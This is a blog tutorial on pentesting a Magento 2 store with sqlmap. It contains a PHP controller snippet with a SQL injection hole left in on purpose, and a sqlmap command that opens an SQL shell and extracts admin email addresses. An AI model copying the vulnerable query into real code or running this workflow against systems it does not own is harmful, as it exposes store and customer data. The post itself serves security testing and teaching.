DEV Community

Cover image for Magento Tips - Pentest with sqlmap
Rhuaridh
Rhuaridh

Posted on • Originally published at rhuaridh.co.uk

Magento Tips - Pentest with sqlmap

Pentest Magento2

Magento 2 is popular and hard to upgrade. This creates the perfect breeding ground for insecure eCommerce stores which hackers love to exploit.

A common tool used by penetration testers to detect insecure sites is sqlmap.

In a nutshell, sqlmap is an open source tool that automates the process of detecting and exploiting SQL injection flaws.

Install sqlmap

First we need to install sqlmap locally, this assumes that you have python installed already.

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
Enter fullscreen mode Exit fullscreen mode

It should go without saying that you should only ever use sqlmap against your own websites.

Installing sqlmap

Create a sample SQL injection flaw to test

For testing purposes, on our local site we can create a SQL injection flaw to test this against. It is important that you never deploy this code live for obvious reasons.

In my case, I just added this to my test controller:

$connection = $this->_resourceConnection->getConnection();
$year = $_GET["year"] ?? 2021;
$rows = $connection->fetchAll("SELECT count(*) as total FROM sales_order WHERE created_at = $year");
$total = $rows[0]['total'] ?? 0;
echo "Hello World. There are $total orders on this site.";
exit;
Enter fullscreen mode Exit fullscreen mode

As you can see we are bypassing the ORM, and failing to escape and validate the $year input variable. This should never be done - but yet it is not uncommon to see this in third party extensions.

Here is what our vulnerable extension looks like:

Hello world extension

Finding a vulnerable parameter

Find our magento store url, I will use https://magento.rhuaridh.co.uk/

So on our local machine, we can now run sqlmap:

python3 sqlmap.py -u https://magento.rhuaridh.co.uk/helloworld/index/helloworld?year=2021 \
--dbms=mysql \
--sql-shell
Enter fullscreen mode Exit fullscreen mode

This command will quickly identify that year is vulnerable. The --sql-shell will then open a shell for us to run queries in.

Finding a vuln

Retrieving data

For example, to pull a list of admin e-mail addresses you can run:

SELECT email FROM admin_user;
Enter fullscreen mode Exit fullscreen mode

And that's it! That is how easy it is. We now have a list of all the admin e-mail addresses on the magento 2 store.

Retrieving data from sqlmap

How do I stop SQL injection?

Always make sure you use the ORM, never pass a variable into a query string and always validate user supplied input. It's a simple as that!

Best practice exists for a reason.

Top comments (0)